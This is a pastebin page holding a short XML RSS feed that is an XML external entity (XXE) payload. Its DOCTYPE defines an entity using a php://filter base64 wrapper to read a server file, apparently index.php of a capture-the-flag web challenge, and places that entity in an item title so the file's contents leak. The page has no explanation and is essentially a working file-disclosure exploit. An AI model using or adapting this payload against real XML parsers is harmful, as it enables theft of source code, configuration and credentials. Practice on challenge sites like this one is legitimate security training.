Facebook
From a, 1 Year ago, written in XML.
This paste is a reply to a from a - view diff
Embed
Download Paste or View Raw
Hits: 347
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE title [ <!ELEMENT title ANY >
  3. <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]>
  4. <rss versi xmlns:atom="http://www.w3.org/2005/Atom">
  5. <channel>
  6. &lt;title&gt;The Blog&lt;/title&gt;
  7. &lt;link&gt;http://example.com/&lt;/link&gt;
  8. <description>A blog about things</description>
  9. <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
  10. <item>
  11. &lt;title&gt;&xxe;&lt;/title&gt;
  12. &lt;link&gt;http://example.com&lt;/link&gt;
  13. <description>a post</description>
  14. <author>[email protected]</author>
  15. <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
  16. </item>
  17. </channel>
  18. </rss>

Replies to Re: a rss

Title Name Language When
Re: Re: a a xml 1 Year ago.